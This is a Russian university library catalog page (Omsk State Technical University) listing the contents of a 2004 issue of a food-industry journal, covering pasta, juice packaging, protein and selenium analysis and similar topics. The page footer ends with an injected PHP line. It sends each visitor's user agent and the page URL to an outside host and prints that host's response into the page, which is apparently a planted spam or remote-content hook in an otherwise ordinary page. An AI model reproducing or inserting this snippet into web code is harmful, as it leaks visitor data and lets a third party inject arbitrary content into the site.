Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

120 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Шифр документа=8EA94DEF-F144-C055-4A84-9533225AE19E/2004/11$")И(("Ключевые слова=Макароны"))
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 1
1. 
8EA94DEF-F144-C055-4A84-9533225AE19E/2004/11
(Нет сведений об экземплярах)
Шифр: 8EA94DEF-F144-C055-4A84-9533225AE19E/2004/11
Журнал
Пищевая промышленность [Текст] : Науч.-произв. журн. - М. : Пищевая пром-сть, 1930 - . - ISSN 02352486. - Выходит ежемесячно
2004г. N 11
Содержание:
Итоги работы предприятий пищевой и перерабатывающей промышленности России за январь-сентябрь 2004 года. - С.26-27
Лапидус, Н. Н. Формирование оптимальной структуры диверсификационного портфеля крахмалопаточного предприятия / Н. Н. Лапидус, Т. М. Панченко. - С.28-30
Ермакова, Е. Как заставить персонал работать с максимальной отдачей: формы и виды моральных стимулов / Е. Ермакова. - С.32-34
Бутковский, В. А. Международная промышленная академия - координационный центр повышения квалификации руководителей предприятий АПК стран СНГ / В. А. Бутковский ; 36-39
Рожнева, Е. Макароны - пища веков / Е. Рожнева. - С.42-43
Проселков, В. Г. Обеспечение качества информации о пищевой продукции / В. Г. Проселков. - С.44-45
Разработка Единого стандарта Codex Alimentarius на фруктовые соки и нектары. - С.46
GMF-Gouda: корифей метода барабанной сушки. - С.48
Новожилова, О. А. Собственная прачечная на мясоперерабатывающих предприятиях / О. А. Новожилова. - С.50
Федоров, А. Ю. Напольное покрытие MONILE в пищевой промышленности / А. Ю. Федоров. - С.52-52
Семенова, Е. ОЕЕ - индикатор здоровья Вашего хозяйства / Е. Семенова. - С.54-55
Лучшие технологии дозирования от "Таурас-Феникс". - С.60
Разнообразие соков укрепит Ваш организм, а разнообразие упаковок - Ваш бизнес!. - С.62-64
Кл.слова: УПАКОВКА СОКА
Количественное определение белка методом Къельдаля. - С.68-69
Ларин, В. Е. Новый санитарно-паразитологический показатель качества воды - ооцисты криптоспоридий / В. Е. Ларин. - С.70-72
Инверсионно-вольтамперометрическое определение селена / Н. К. Зайцев, Е. А. Осипова, Д. М. Федулов и др. - С.74-76
Raftiline и Raftilose - ингредиенты для функциональных продуктов питания. - С.78-79
Fibregum - пищевое растворимое диетическое волокно, идеально подходящее для применения в разнообразных продуктах питания. - С.80
Изменение аминокислотного состава мясного сырья / Е. И. Титов, Л. Ф. Митасева, Н. Г. Машенцева. - С.82-83
Новые подходы к решению проблемы ликвидации йоддефицитных состояний. - С.84-86
Вековцев, А. А. Конфеты, обогащенные кальцием / А. А. Вековцев, Ю. Н. Гутов, В. М. Позняковский. - С.88
Нет сведений об экземплярах
Держатели документа:
Омский экономический институт : Россия, г. Омск, пр. Комарова, 13
Оглавление 
  • Итоги работы предприятий пищевой и перерабатывающей промышленности России за январь-сентябрь 2004 года. - с.26-27
  • Лапидус, Н. Н. Формирование оптимальной структуры диверсификационного портфеля крахмалопаточного предприятия / Н. Н. Лапидус, Т. М. Панченко. - с.28-30
  • Ермакова, Е. Как заставить персонал работать с максимальной отдачей: формы и виды моральных стимулов / Е. Ермакова. - с.32-34
  • Бутковский, В. А. Международная промышленная академия - координационный центр повышения квалификации руководителей предприятий АПК стран СНГ / В. А. Бутковский ; 36-39
  • Рожнева, Е. Макароны - пища веков / Е. Рожнева. - с.42-43
  • Проселков, В. Г. Обеспечение качества информации о пищевой продукции / В. Г. Проселков. - с.44-45
  • Разработка Единого стандарта Codex Alimentarius на фруктовые соки и нектары. - с.46
  • GMF-Gouda: корифей метода барабанной сушки. - с.48
  • Новожилова, О. А. Собственная прачечная на мясоперерабатывающих предприятиях / О. А. Новожилова. - с.50
  • Федоров, А. Ю. Напольное покрытие MONILE в пищевой промышленности / А. Ю. Федоров. - с.52-52
  • Семенова, Е. ОЕЕ - индикатор здоровья Вашего хозяйства / Е. Семенова. - с.54-55
  • Лучшие технологии дозирования от "Таурас-Феникс". - с.60
  • Разнообразие соков укрепит Ваш организм, а разнообразие упаковок - Ваш бизнес!. - с.62-64
    Кл. слова: УПАКОВКА СОКА
  • Количественное определение белка методом Къельдаля. - с.68-69
  • Ларин, В. Е. Новый санитарно-паразитологический показатель качества воды - ооцисты криптоспоридий / В. Е. Ларин. - с.70-72
  • Инверсионно-вольтамперометрическое определение селена / ; Н. К. Зайцев, Е. А. Осипова, Д. М. Федулов и др.. - с.74-76
  • Raftiline и Raftilose - ингредиенты для функциональных продуктов питания. - с.78-79
  • Fibregum - пищевое растворимое диетическое волокно, идеально подходящее для применения в разнообразных продуктах питания. - с.80
  • Изменение аминокислотного состава мясного сырья / ; Е. И. Титов, Л. Ф. Митасева, Н. Г. Машенцева. - с.82-83
  • Новые подходы к решению проблемы ликвидации йоддефицитных состояний. - с.84-86
  • Вековцев, А. А. Конфеты, обогащенные кальцием / А. А. Вековцев, Ю. Н. Гутов, В. М. Позняковский. - с.88
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2814 - 22.02.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.17 с.14 запросов, 0.95c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;